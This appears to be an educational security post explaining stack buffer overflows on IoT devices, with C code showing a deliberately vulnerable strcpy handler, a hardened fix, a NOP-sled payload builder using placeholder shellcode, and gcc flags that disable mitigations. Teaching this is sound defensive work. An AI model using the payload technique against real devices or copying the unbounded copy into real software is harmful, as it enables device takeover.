Stack-based buffer overflow – the biggest enemy of the IoT world

Preface: ASLR, NX (non-executable stack) and stack canaries make this class of memory-safety weakness harder for malware authors to exploit, but they do not remove it, and many IoT devices ship without one or more of them.

Background: EIP is the instruction pointer register on 32-bit x86; it holds the address of the next instruction to be executed. Keeping control of where execution goes next, so that an attacker cannot redirect it, is central to preventing malware from taking over a process. The EIP register cannot be accessed directly by software; it is controlled implicitly by control-transfer instructions (JMP, Jcc, CALL and RET), interrupts and exceptions. The only way to read EIP is to execute a CALL instruction and then read the return address that the CALL pushed onto the procedure stack.

Potential cyber attack: Referring to the diagram, the vulnerable service listens on TCP port 80. Sending it an HTTP GET request of 300 or more bytes overflows a fixed-size stack buffer and overwrites the saved return address, which RET loads into EIP. The malware overwrites that address with one pointing into a NOP (No Operation) sled placed after it, followed by the shellcode; execution slides through the NOPs into the shellcode, which then runs with the privileges of the compromised process and breaks its access controls.
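The following is an added example in C (not code from the original post) showing the handler pattern behind this attack, a hardened version of it, and the payload layout described above: filler up to the saved return address, the new EIP, the NOP sled, then the shellcode. The 256-byte buffer, the 260-byte offset to the saved return address, the stack address 0xbffff5e0 and the INT3 placeholder shellcode are all assumptions for illustration; a real attack finds the offset and address with a debugger on the target.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* assumed size of the stack buffer holding the request */
#define X86_NOP  0x90  /* the one-byte NOP opcode on x86 */

/* Deliberately vulnerable handler: the request is copied into a fixed
 * stack buffer with no length check. A request longer than BUF_SIZE runs
 * past the buffer, over the saved EBP and the saved return address, which
 * RET later loads into EIP. Never feed untrusted data to this function;
 * it exists only to show the bug and is not called below. */
void handle_get_vulnerable(const char *request)
{
    char buf[BUF_SIZE];
    strcpy(buf, request);                 /* the overflow */
    printf("vulnerable handler got: %.16s...\n", buf);
}

/* Hardened handler: refuse anything that does not fit together with its
 * terminator and never copy past the end of `out`.
 * Returns 0 on success, -1 if the request is too long. */
int handle_get_hardened(const char *request, char *out, size_t out_len)
{
    size_t n = 0;
    while (n < out_len && request[n] != '\0')   /* bounded length scan */
        n++;
    if (n == out_len)                     /* no room for the NUL */
        return -1;
    memcpy(out, request, n);
    out[n] = '\0';
    return 0;
}

/* Build the payload layout the post describes:
 *   [pad_len filler bytes][new EIP, little-endian][NOP sled][shellcode]
 * pad_len is the distance from the start of the buffer to the saved return
 * address (assumed here; found with a debugger in practice). new_eip should
 * point inside the NOP sled so that a slightly wrong stack address still
 * slides into the shellcode. Returns the payload length, or 0 if it does
 * not fit in `out`. */
size_t build_overflow_payload(uint8_t *out, size_t cap,
                              size_t pad_len, uint32_t new_eip,
                              size_t nop_len,
                              const uint8_t *shellcode, size_t sc_len)
{
    size_t total = pad_len + sizeof new_eip + nop_len + sc_len;
    if (total > cap)
        return 0;
    memset(out, 'A', pad_len);
    for (size_t i = 0; i < sizeof new_eip; i++)   /* x86 is little-endian */
        out[pad_len + i] = (uint8_t)(new_eip >> (8 * i));
    memset(out + pad_len + sizeof new_eip, X86_NOP, nop_len);
    memcpy(out + pad_len + sizeof new_eip + nop_len, shellcode, sc_len);
    return total;
}

int main(void)
{
    /* Placeholder "shellcode": INT3 breakpoints, not a real payload. */
    static const uint8_t shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc };
    uint8_t payload[512];
    char out[BUF_SIZE];

    /* 260 = 256-byte buffer + 4-byte saved EBP on a frame with no extra
     * padding; 0xbffff5e0 is a made-up stack address inside the NOP sled. */
    size_t len = build_overflow_payload(payload, sizeof payload,
                                        260, 0xbffff5e0u, 32,
                                        shellcode, sizeof shellcode);
    printf("payload length: %zu bytes (saved EIP at offset 260)\n", len);

    if (handle_get_hardened((const char *)payload, out, sizeof out) == -1)
        printf("hardened handler rejected the %zu-byte request\n", len);
    if (handle_get_hardened("GET / HTTP/1.0", out, sizeof out) == 0)
        printf("hardened handler accepted: %s\n", out);
    return 0;
}
```

The 260 + 4 + 32 + 4 bytes come to exactly 300, matching the request size in the scenario. The vulnerable handler is never given the payload here because the overflow is undefined behaviour; to watch it actually redirect EIP, build a 32-bit binary with the mitigations from the preface turned off (for example `gcc -m32 -fno-stack-protector -z execstack`) and step through the RET in a debugger.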

Status: under observation.
